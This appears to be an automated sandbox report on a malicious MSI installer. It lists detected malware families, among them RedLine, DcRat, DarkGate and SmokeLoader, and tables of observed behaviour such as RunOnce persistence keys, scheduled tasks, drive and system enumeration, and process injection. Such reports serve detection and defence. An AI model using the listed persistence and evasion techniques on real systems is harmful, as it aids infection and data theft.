Analysis Overview
SHA256
6da198925581418863170f05b832cd1584b923278d0730d779a30ec96513111d
Threat Level: Known bad
The file 6da198925581418863170f05b832cd1584b923278d0730d779a30ec96513111d.msi was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateProcessExOtherParentProcess
DcRat
Mystic
RedLine
RedLine payload
Detect Mystic stealer payload
DarkGate
SmokeLoader
Suspicious Office macro
Blocklisted process makes network request
Checks computer location settings
UPX packed file
Modifies file permissions
.NET Reactor proctector
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Uses Volume Shadow Copy service COM API
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Uses Task Scheduler COM API
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Enumerates processes with tasklist
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-10 22:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-10 22:01
Reported
2023-11-10 22:31
Platform
win10v2004-20231020-en
Max time kernel
1787s
Max time network
1792s
Command Line
Signatures
DarkGate
DcRat
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Detect Mystic stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Mystic
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2536 created 3068 | N/A | C:\Windows\system32\taskmgr.exe | C:\Windows\system32\msiexec.exe |
| PID 2536 created 3068 | N/A | C:\Windows\system32\taskmgr.exe | C:\Windows\system32\msiexec.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\2023-10-21\696aaa0a2d06804fd98c3b16ae704eb779ddc833a6782fd289716dcf7fda35c8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\5Bz2qb4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\6xw2GJ7.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6EO2Xx5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\6BL1kL7.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MW-f55ff621-46e1-493b-b2bb-7e39b4be8933\files\windbg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MW-f55ff621-46e1-493b-b2bb-7e39b4be8933\files\windbg.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ICACLS.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ICACLS.EXE | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\Downloads\2023-10-21\1d9ae562e502248d16291201495a68309e2a2f8379994df23eecc750505cc811.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\cX2qj28.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup9 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP010.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\ZF2zr63.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Downloads\2023-10-21\2b7ef6e04c3bf2603ed41f48ab872fa909f452eb96cac5e7dabc5ad6b92b9445.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\lt8vo92.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\rH1Hg13.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup9 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP009.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\Mk5aY05.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP008.TMP\\\"" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup8 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP009.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\oi9NR71.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SF6zA60.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Np2vg97.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Uc1gD21.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup8 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP008.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\cN9nQ50.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\Downloads\2023-10-21\58cbf150847528fa62ad3502e5016f444b6a6409d3202d94702dfbf4fcb761d9.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup10 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP011.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\Cb7yP98.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\e5acd34.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5acd34.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{D70D8767-7D90-4463-918C-930A0DC2454D} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI4EA9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\EXPAND.EXE | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\EXPAND.EXE | N/A |
| File opened for modification | C:\Windows\Installer\MSIDD1F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDD2F.tmp | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000004e6fa88768ff2e40000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000004e6fa880000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090004e6fa88000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d04e6fa88000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000004e6fa8800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\tmpa\Autoit3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\tmpa\Autoit3.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 